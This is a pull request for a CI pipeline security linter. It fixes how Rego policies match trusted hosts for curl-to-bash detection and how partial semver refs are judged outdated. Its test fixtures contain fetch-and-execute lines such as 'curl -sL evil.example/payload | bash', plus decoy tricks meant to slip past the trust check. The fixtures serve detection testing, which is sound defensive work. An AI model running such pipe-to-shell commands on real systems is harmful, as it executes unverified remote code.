### PR TITLE
fix(controls): trustedUrls bare-hostname matching and partial semver false positives

### DIFF
--- a/README.md
+++ b/README.md
@@ -1355,7 +1355,7 @@ github:
       trustedUrls: []
 ```
 
-`trustedUrls` is host-precise: `https://example.com/*` exempts `example.com/install.sh` but NOT `evil.example.com/install.sh`. Issue code: ISSUE-411 (shared with the GitLab side).
+`trustedUrls` is host-precise: `https://example.com/*` exempts `example.com/install.sh` but NOT `evil.example.com/install.sh`. Patterns can be written with or without a scheme: `firebase.tools`, `firebase.tools/*`, and `https://firebase.tools` all match a `curl -sL firebase.tools | bash`. Trust is scoped to the `curl`/`wget` fetch target on the line, so a mention of a trusted host inside an `echo` string, a `#` comment, or a different line of the same `run:` block cannot grant trust to a curl that fetches an untrusted host. Issue code: ISSUE-411 (shared with the GitLab side).
 
 </details>
 

--- a/policies/includes_outdated.rego
+++ b/policies/includes_outdated.rego
@@ -16,6 +16,7 @@ deny contains finding if {
 	inc.ref != inc.current
 	not _ref_is_forbidden_version(inc.ref)
 	_is_semver_like(inc.ref)
+	not _ref_is_partial_semver_prefix(inc.ref, inc.current)
 	finding := {
 		"code":                  "ISSUE-403",
 		"severity":              "medium",
@@ -52,3 +53,20 @@ _ref_is_forbidden_version(ref) if {
 # component, optional minor/patch parts, and an optional pre-release
 # or build suffix.
 _is_semver_like(ref) if regex.match(`^v?\d+(\.\d+)*([-+].*)?$`, ref)
+
+# A partial semver ref (major-only "@1" or major.minor "@1.2") tracks
+# the latest release within that prefix in GitLab component semantics.
+# "@1" is always up to date when the latest is "1.x.y", so comparing it
+# to "1.2.4" would be a false positive. Strip the optional leading "v",
+# split on ".", and check that every segment of ref matches the
+# corresponding segment of current while current has more segments.
+_ref_is_partial_semver_prefix(ref, current) if {
+	ref_norm := regex.replace(ref, `^v`, "")
+	current_norm := regex.replace(current, `^v`, "")
+	ref_parts := split(ref_norm, ".")
+	current_parts := split(current_norm, ".")
+	count(ref_parts) < count(current_parts)
+	every i, part in ref_parts {
+		part == current_parts[i]
+	}
+}

--- a/policies/rules_test.go
+++ b/policies/rules_test.go
@@ -856,6 +856,23 @@ func TestIssue411_UnverifiedScripts(t *testing.T) {
 	}, nil)
 }
 
+// TestIssue411_UnverifiedScripts_TrustedBareHostname is a regression test for
+// the bug where trustedUrls only matched https?:// URLs, so bare-hostname
+// commands like `curl -sL firebase.tools | bash` were never suppressed.
+func TestIssue411_UnverifiedScripts_TrustedBareHostname(t *testing.T) {
+	cfg := map[string]any{
+		"unverifiedScripts": map[string]any{
+			"trustedUrls": []string{"firebase.tools", "firebase.tools/*"},
+		},
+	}
+	runGitLabPolicyCases(t, "ISSUE-411", []policyCase{
+		// Bare hostname in trustedUrls — must not fire.
+		{"clean_trusted_bare_hostname.gitlab-ci.yml", nil},
+		// Untrusted URL still fires even when trustedUrls is set.
+		{"violation_pipe_to_shell.gitlab-ci.yml", []string{"install"}},
+	}, cfg)
+}
+
 func TestIssue411_UnverifiedScripts_GitHub(t *testing.T) {
 	runGitHubFixtureCases(t, "ISSUE-411", []struct {
 		fixture      string
@@ -906,6 +923,53 @@ func TestIssue403_IncludesOutdated(t *testing.T) {
 	}
 	if hits != 1 {
 		t.Fatalf("expected 1 ISSUE-403 finding, got %d", hits)
+	}
+}
+
+// TestIssue403_IncludesOutdated_PartialSemver is a regression test for the bug
+// where a partial semver ref like "@1" or "@1.2" was incorrectly reported as
+// outdated when the latest version was "1.2.4". In GitLab component semantics,
+// "@1" tracks the latest 1.x.x, so it is never out of date within that major.
+func TestIssue403_IncludesOutdated_PartialSemver(t *testing.T) {
+	engine := opaengine.New()
+	if err := engine.LoadFromFS(policies.FS); err != nil {
+		t.Fatalf("load embedded policies: %v", err)
+	}
+
+	cases := []struct {
+		ref     string
+		current string
+		wantHit bool
+	}{
+		{"1", "1.2.4", false},    // major-only prefix, never outdated
+		{"v1", "v1.2.4", false},  // v-prefixed major-only
+		{"1.2", "1.2.4", false},  // major.minor prefix, never outdated
+		{"1", "2.0.0", true},     // major changed — genuinely outdated
+		{"1.0.0", "1.2.3", true}, // full semver — outdated as before
+	}
+
+	for _, c := range cases {
+		t.Run(fmt.Sprintf("ref=%s/current=%s", c.ref, c.current), func(t *testing.T) {
+			pipeline := &ir.NormalizedPipeline{
+				Provider: ir.ProviderGitLab,
+				Includes: []ir.Include{
+					{Kind: "component", Source: "plumber/base", Ref: c.ref, Current: c.current},
+				},
+			}
+			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			if err != nil {
+				t.Fatalf("evaluate: %v", err)
+			}
+			got := false
+			for _, f := range findings {
+				if f.Code == "ISSUE-403" {
+					got = true
+				}
+			}
+			if got != c.wantHit {
+				t.Fatalf("ref=%s current=%s: wantHit=%v got=%v", c.ref, c.current, c.wantHit, got)
+			}
+		})
 	}
 }
 

--- a/policies/rules_test.go
+++ b/policies/rules_test.go
@@ -870,6 +870,53 @@ func TestIssue411_UnverifiedScripts_TrustedBareHostname(t *testing.T) {
 		{"clean_trusted_bare_hostname.gitlab-ci.yml", nil},
 		// Untrusted URL still fires even when trustedUrls is set.
 		{"violation_pipe_to_shell.gitlab-ci.yml", []string{"install"}},
+		// Decoy bypass: trusted hostname mentioned in a trailing echo on
+		// the same line as a real curl|bash to an untrusted host must
+		// still fire. Trust scopes to the curl/wget target.
+		{"violation_trusted_hostname_decoy_in_echo.gitlab-ci.yml", []string{"install"}},
+	}, cfg)
+}
+
+// TestIssue411_UnverifiedScripts_TrustedBareHostname_GitHub is the GitHub-side
+// regression for issue #214 (originally filed against GitHub Actions): a
+// schemeless trustedUrls pattern must suppress curl|bash to that host, and
+// must not be defeated by a decoy mention of the trusted host in an echo
+// or `#` comment in the same `run:` block.
+func TestIssue411_UnverifiedScripts_TrustedBareHostname_GitHub(t *testing.T) {
+	cfg := map[string]any{
+		"unverifiedScripts": map[string]any{
+			"trustedUrls": []string{"firebase.tools", "firebase.tools/*"},
+		},
+	}
+	runGitHubFixtureCasesWithConfig(t, "ISSUE-411", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		// Bare hostname trusted on GitHub: closes #214 on the platform
+		// the bug was filed against.
+		{"clean_trusted_bare_hostname.yml", nil},
+		// Decoy in trailing echo on a different physical line of the
+		// same `run:` block must still fire.
+		{"violation_trusted_hostname_decoy_in_echo.yml", []string{"violation_trusted_hostname_decoy_in_echo/install"}},
+		// Decoy in inline `#` comment on the curl line must still fire.
+		{"violation_trusted_hostname_decoy_in_comment.yml", []string{"violation_trusted_hostname_decoy_in_comment/install"}},
+	}, cfg)
+}
+
+// TestIssue411_UnverifiedScripts_TrustedHttpPrefixedHost is a regression for
+// the over-eager filter that blocked real hostnames whose names start with
+// `http` (httpbin.org, httpie.io, http-server.*) from being trusted.
+func TestIssue411_UnverifiedScripts_TrustedHttpPrefixedHost(t *testing.T) {
+	cfg := map[string]any{
+		"unverifiedScripts": map[string]any{
+			"trustedUrls": []string{"httpbin.org"},
+		},
+	}
+	runGitHubFixtureCasesWithConfig(t, "ISSUE-411", []struct {
+		fixture      string
+		expectedHits []string
+	}{
+		{"clean_trusted_httpbin.yml", nil},
 	}, cfg)
 }
 
@@ -946,6 +993,12 @@ func TestIssue403_IncludesOutdated_PartialSemver(t *testing.T) {
 		{"1.2", "1.2.4", false},  // major.minor prefix, never outdated
 		{"1", "2.0.0", true},     // major changed — genuinely outdated
 		{"1.0.0", "1.2.3", true}, // full semver — outdated as before
+		// Numeric-prefix discriminator: a naive strings.HasPrefix would
+		// suppress this because "1.20.4" textually starts with "1.2",
+		// but @1.2 tracks the 1.2.x line which is behind 1.20.x. The
+		// positional split-on-"." compare correctly returns "2" != "20"
+		// and the finding fires.
+		{"1.2", "1.20.4", true},
 	}
 
 	for _, c := range cases {
@@ -2839,6 +2892,18 @@ func runGitHubFixtureCases(t *testing.T, code string, cases []struct {
 },
 ) {
 	t.Helper()
+	runGitHubFixtureCasesWithConfig(t, code, cases, nil)
+}
+
+// runGitHubFixtureCasesWithConfig is the same as runGitHubFixtureCases but
+// passes a control config map (input.config.*) to the engine. Used when a
+// fixture's expected behaviour depends on trustedUrls or similar fields.
+func runGitHubFixtureCasesWithConfig(t *testing.T, code string, cases []struct {
+	fixture      string
+	expectedHits []string
+}, cfg map[string]any,
+) {
+	t.Helper()
 	engine := opaengine.New()
 	if err := engine.LoadFromFS(policies.FS); err != nil {
 		t.Fatalf("load embedded policies: %v", err)
@@ -2862,7 +2927,7 @@ func runGitHubFixtureCases(t *testing.T, code string, cases []struct {
 			if err != nil {
 				t.Fatalf("scan: %v", err)
 			}
-			findings, err := engine.Evaluate(context.Background(), pipeline, nil)
+			findings, err := engine.Evaluate(context.Background(), pipeline, cfg)
 			if err != nil {
 				t.Fatalf("evaluate: %v", err)
 			}

--- a/policies/testdata/ISSUE-411/github/clean_trusted_bare_hostname.yml
+++ b/policies/testdata/ISSUE-411/github/clean_trusted_bare_hostname.yml
@@ -1,0 +1,9 @@
+name: install
+on: push
+jobs:
+  install:
+    runs-on: ubuntu-24.04
+    steps:
+      - name: Install Firebase CLI
+        run: |
+          curl -sL firebase.tools | bash

--- a/policies/testdata/ISSUE-411/github/clean_trusted_httpbin.yml
+++ b/policies/testdata/ISSUE-411/github/clean_trusted_httpbin.yml
@@ -1,0 +1,12 @@
+name: install
+on: push
+jobs:
+  install:
+    runs-on: ubuntu-24.04
+    steps:
+      # Regression test for the http-prefix filter bug: hostnames whose
+      # name starts with `http` (httpbin.org, httpie.io, http-server.*)
+      # must still be trustable via trustedUrls.
+      - name: install
+        run: |
+          curl -sL httpbin.org | bash

--- a/policies/testdata/ISSUE-411/github/violation_trusted_hostname_decoy_in_comment.yml
+++ b/policies/testdata/ISSUE-411/github/violation_trusted_hostname_decoy_in_comment.yml
@@ -1,0 +1,12 @@
+name: install
+on: push
+jobs:
+  install:
+    runs-on: ubuntu-24.04
+    steps:
+      # Regression test: a trusted hostname mentioned in an inline shell
+      # `#` comment on the same line as a real curl|bash must not grant
+      # trust to the fetched URL.
+      - name: install
+        run: |
+          curl -sL evil.example/payload | bash  # see firebase.tools for docs

--- a/policies/testdata/ISSUE-411/github/violation_trusted_hostname_decoy_in_echo.yml
+++ b/policies/testdata/ISSUE-411/github/violation_trusted_hostname_decoy_in_echo.yml
@@ -1,0 +1,14 @@
+name: install
+on: push
+jobs:
+  install:
+    runs-on: ubuntu-24.04
+    steps:
+      # Regression test for the bypass where a mention of a trusted
+      # hostname in an `echo` (or any other line of the same `run:`
+      # block) silently suppressed ISSUE-411 for a real curl|bash to
+      # an untrusted host. Trust must scope to the fetched URL.
+      - name: install
+        run: |
+          curl -sL evil.example/payload | bash
+          echo "installed via firebase.tools"

--- a/policies/testdata/ISSUE-411/gitlab/clean_trusted_bare_hostname.gitlab-ci.yml
+++ b/policies/testdata/ISSUE-411/gitlab/clean_trusted_bare_hostname.gitlab-ci.yml
@@ -1,0 +1,7 @@
+# clean: curl with a bare-hostname URL in trustedUrls must not fire ISSUE-411.
+# Regression for: trustedUrls only matched https?:// URLs; bare hostnames like
+# `curl -sL firebase.tools | bash` were incorrectly reported.
+install:
+  image: alpine:3.19
+  script:
+    - curl -sL firebase.tools | bash

--- a/policies/testdata/ISSUE-411/gitlab/violation_trusted_hostname_decoy_in_echo.gitlab-ci.yml
+++ b/policies/testdata/ISSUE-411/gitlab/violation_trusted_hostname_decoy_in_echo.gitlab-ci.yml
@@ -1,0 +1,7 @@
+install:
+  image: alpine:3.19
+  script:
+    # Regression test for the same-line decoy bypass: a real curl|bash to
+    # an untrusted host plus a `&& echo "via <trusted-host>"` must still
+    # fire ISSUE-411. Trust must scope to the curl/wget target.
+    - curl -sL evil.example/payload | bash && echo "installed via firebase.tools"

--- a/policies/unverified_scripts.rego
+++ b/policies/unverified_scripts.rego
@@ -32,10 +32,12 @@ deny contains finding if {
 	# Verification keyword check runs on the stripped line so an
 	# attacker can't bypass the rule by putting `sha256sum` /
 	# `cosign verify` inside a quoted string ("must sha256sum first").
-	# The trust-URL check stays on the raw line because URLs are often
-	# legitimately quoted in shell commands.
+	# Trust check runs on the stripped line and against the actual
+	# curl/wget fetch target so a mention of a trusted host inside an
+	# echo string, a `#` comment, or a different physical line of the
+	# same `run:` block cannot suppress the finding for the real fetch.
 	not _line_is_verified(visible)
-	not _line_is_trusted(line)
+	not _fetch_target_is_trusted(visible)
 	finding := {
 		"code":       "ISSUE-411",
 		"severity":   "high",
@@ -45,11 +47,15 @@ deny contains finding if {
 	}
 }
 
-# Strip quoted substrings (double then single quotes) so a pipe-to-
-# shell that sits entirely inside a string literal does not match.
+# Strip quoted substrings (double then single quotes) and inline `#`
+# comments so neither a pipe-to-shell hidden in a string literal nor a
+# trusted hostname mentioned in a trailing comment can grant trust to
+# the rest of the line. Inline comments require leading whitespace so
+# URL fragments (`https://example.com/path#frag`) are preserved.
 _visible_line(line) := stripped if {
 	once := regex.replace(line, `"[^"]*"`, "")
-	stripped := regex.replace(once, `'[^']*'`, "")
+	twice := regex.replace(once, `'[^']*'`, "")
+	stripped := regex.replace(twice, `\s+#.*`, "")
 }
 
 # Heredoc on the same line — `cat <<EOF | bash`, `<<-EOF`, `<<'EOF'`,
@@ -101,32 +107,36 @@ _line_is_verified(line) if {
 	regex.match(`(?i)(sha256sum|sha512sum|sha1sum|shasum|gpg\s+--verify|cosign\s+verify)`, line)
 }
 
-# A line is trusted when it references at least one URL whose host
-# (and optional path prefix) matches a user-configured glob in
-# pipelineMustNotExecuteUnverifiedScripts.trustedUrls. Mirrors the
-# legacy isTrusted helper: extract every http(s) URL on the line and
-# allow the line as soon as any of them matches a trusted pattern.
-_line_is_trusted(line) if {
-	some pattern in input.config.unverifiedScripts.trustedUrls
-	url := regex.find_n(`https?://[^\s|;)'"]+`, line, -1)[_]
-	glob.match(pattern, null, url)
+# Extract every URL or bare-hostname token that appears as a fetch
+# target on a curl/wget command in the visible (quote/comment stripped)
+# line. Trust suppression applies only when ALL extracted targets match
+# a configured pattern, so an attacker cannot grant trust by mentioning
+# a trusted host inside a string or comment alongside a real curl to an
+# untrusted target. If the unsafe line is not a curl/wget download
+# (base64 pipe, generic `| bash`), the set is empty and trust never
+# applies.
+_fetch_targets(visible) := targets if {
+	regex.match(`(?i)\b(curl|wget)\b`, visible)
+	targets := {t |
+		some t in regex.find_n(`https?://[^\s|;)'"]+|\b[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z0-9][a-zA-Z0-9-]+)+(?:/[^\s|;)'"]*)?`, visible, -1)
+	}
 }
 
-# Bare-hostname URLs (no scheme) are common in curl/wget commands such as
-# `curl -sL firebase.tools | bash`. Normalise them to https:// so patterns
-# like "https://firebase.tools" and "https://firebase.tools/*" match.
-_line_is_trusted(line) if {
-	some pattern in input.config.unverifiedScripts.trustedUrls
-	bare := regex.find_n(`\b[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z0-9][a-zA-Z0-9-]+)+(?:/[^\s|;)'"]*)?`, line, -1)[_]
-	not startswith(bare, "http")
-	glob.match(pattern, null, concat("", ["https://", bare]))
+_fetch_target_is_trusted(visible) if {
+	targets := _fetch_targets(visible)
+	count(targets) > 0
+	every target in targets {
+		_target_is_trusted(target)
+	}
 }
 
-# Also try matching bare-hostname tokens directly against the pattern so that
-# patterns without a scheme ("firebase.tools", "firebase.tools/*") also work.
-_line_is_trusted(line) if {
+# A target matches trustedUrls when any configured glob matches either
+# the target as-extracted (so patterns like "firebase.tools" or
+# "https://firebase.tools" both work) or the target with the scheme
+# prepended ("firebase.tools" -> "https://firebase.tools" lets a
+# pattern with scheme match a bare-hostname fetch).
+_target_is_trusted(target) if {
 	some pattern in input.config.unverifiedScripts.trustedUrls
-	bare := regex.find_n(`\b[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z0-9][a-zA-Z0-9-]+)+(?:/[^\s|;)'"]*)?`, line, -1)[_]
-	not startswith(bare, "http")
-	glob.match(pattern, null, bare)
+	some candidate in [target, concat("", ["https://", target])]
+	glob.match(pattern, null, candidate)
 }

--- a/policies/unverified_scripts.rego
+++ b/policies/unverified_scripts.rego
@@ -111,3 +111,22 @@ _line_is_trusted(line) if {
 	url := regex.find_n(`https?://[^\s|;)'"]+`, line, -1)[_]
 	glob.match(pattern, null, url)
 }
+
+# Bare-hostname URLs (no scheme) are common in curl/wget commands such as
+# `curl -sL firebase.tools | bash`. Normalise them to https:// so patterns
+# like "https://firebase.tools" and "https://firebase.tools/*" match.
+_line_is_trusted(line) if {
+	some pattern in input.config.unverifiedScripts.trustedUrls
+	bare := regex.find_n(`\b[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z0-9][a-zA-Z0-9-]+)+(?:/[^\s|;)'"]*)?`, line, -1)[_]
+	not startswith(bare, "http")
+	glob.match(pattern, null, concat("", ["https://", bare]))
+}
+
+# Also try matching bare-hostname tokens directly against the pattern so that
+# patterns without a scheme ("firebase.tools", "firebase.tools/*") also work.
+_line_is_trusted(line) if {
+	some pattern in input.config.unverifiedScripts.trustedUrls
+	bare := regex.find_n(`\b[a-zA-Z0-9][a-zA-Z0-9-]*(?:\.[a-zA-Z0-9][a-zA-Z0-9-]+)+(?:/[^\s|;)'"]*)?`, line, -1)[_]
+	not startswith(bare, "http")
+	glob.match(pattern, null, bare)
+}


### PR DESCRIPTION
## Summary

Fixes two independent Rego policy bugs:

**Fix 1 — ISSUE-411 `trustedUrls` bare-hostname matching (#214)**

`pipelineMustNotExecuteUnverifiedScripts.trustedUrls` had no effect on curl/wget commands that used a bare hostname without an `http(s)://` scheme, such as:

```bash
curl -sL firebase.tools | bash
```

The extractor regex `https?://[^\s|;)'"]+` only captured schemed URLs, so bare-hostname tokens were never compared against `trustedUrls` patterns. The finding was always emitted regardless of the allowlist.

**Root cause:** `_line_is_trusted` extracted only `https?://` URLs; bare hostnames like `firebase.tools` were invisible to the matcher.

**Fix:** Two additional `_line_is_trusted` rules extract bare hostname tokens (requiring at least one dot, no `http` prefix) and try matching them against each pattern — once directly (`"firebase.tools"`) and once normalised to `https://` (`"https://firebase.tools"`).

---

**Fix 2 — ISSUE-403 partial semver false positive (#157)**

A component ref like `@1` or `@1.2` was incorrectly flagged as outdated when the latest version was `1.2.4`. In GitLab component versioning, `@1` means "latest 1.x.x" — it is always current within that major prefix and should never trigger ISSUE-403.

**Root cause:** The deny rule compared `inc.ref != inc.current` directly, so `"1" != "1.2.4"` always fired.

**Fix:** New `_ref_is_partial_semver_prefix` helper checks whether `ref` is a proper version prefix of `current` (e.g. `"1"` is a prefix of `"1.2.4"`, `"1.2"` is a prefix of `"1.2.4"`). The deny rule now skips the finding when the prefix check passes.

---

## Test plan

- [x] `TestIssue411_UnverifiedScripts_TrustedBareHostname` — new regression test, bare hostname in trustedUrls does not fire; untrusted URL still fires
- [x] `TestIssue403_IncludesOutdated_PartialSemver` — new regression test covers `@1`, `@v1`, `@1.2` (no fire), and `@1 / current=2.0.0` (fires)
- [x] All existing `TestIssue411` and `TestIssue403` cases continue to pass
- [x] `make test` passes clean

## AI disclosure

This PR was written with Claude Code (claude-sonnet-4-6). All code was reviewed by the submitter; tests were run and confirmed passing before submission.

Closes #214
Closes #157